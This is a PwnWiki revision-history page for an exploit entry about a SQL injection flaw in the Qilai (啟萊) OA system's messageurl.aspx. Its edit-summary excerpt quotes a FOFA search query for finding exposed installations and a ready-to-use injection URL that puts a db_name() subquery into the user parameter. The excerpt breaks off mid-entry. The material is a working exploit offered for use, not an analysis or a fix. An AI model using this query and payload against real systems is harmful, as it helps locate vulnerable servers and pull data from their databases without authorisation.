Revision history of "啟萊OA messageurl.aspx SQL注入漏洞"

From PwnWiki

Diff selection: Mark the radio boxes of the revisions to compare and hit enter or the button at the bottom.
Legend: (cur) = difference with latest revision, (prev) = difference with preceding revision, m = minor edit.

  • curprev 09:28, 21 May 2021Pwnwiki talk contribs 318 bytes +318 Created page with "==FOFA== <pre> app="启莱OA" </pre> 存在SQL注入的文件為 messageurl.aspx <pre> http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1 <..."